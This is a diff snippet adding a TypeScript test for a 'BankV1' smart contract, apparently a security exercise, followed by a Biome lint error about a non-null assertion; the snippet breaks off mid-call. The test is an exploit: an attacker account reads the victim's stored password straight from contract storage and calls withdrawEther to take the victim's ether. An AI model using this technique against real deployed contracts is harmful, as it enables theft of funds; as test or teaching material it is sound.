app/contracts/BankV1.spec.ts

```
@@ -0,0 +1,69 @@
+})
+
+describe('BankV1', () => {
+  test('Take ahmed balance', async () => {
+    expect(await client.getBalance({ address: attacker.toString() })).toBe(parseEther('1'))
+
+    const slot = keccak256(encodeAbiParameters([{ type: 'address' }, { type: 'uint256' }], [ahmed.toString(), 1n]))
+
+    const password = await client.getStorageAt({ address: bank.address, slot })
+
+    await client.tevmContract({
+      ...bank.write.withdrawEther(ahmed.toString(), hexToBigInt(password!), parseEther('1'), attacker.toString()),
```

Biome (1.9.4)

[error] Forbidden non-null assertion.



(lint/style/noNonNullAssertion)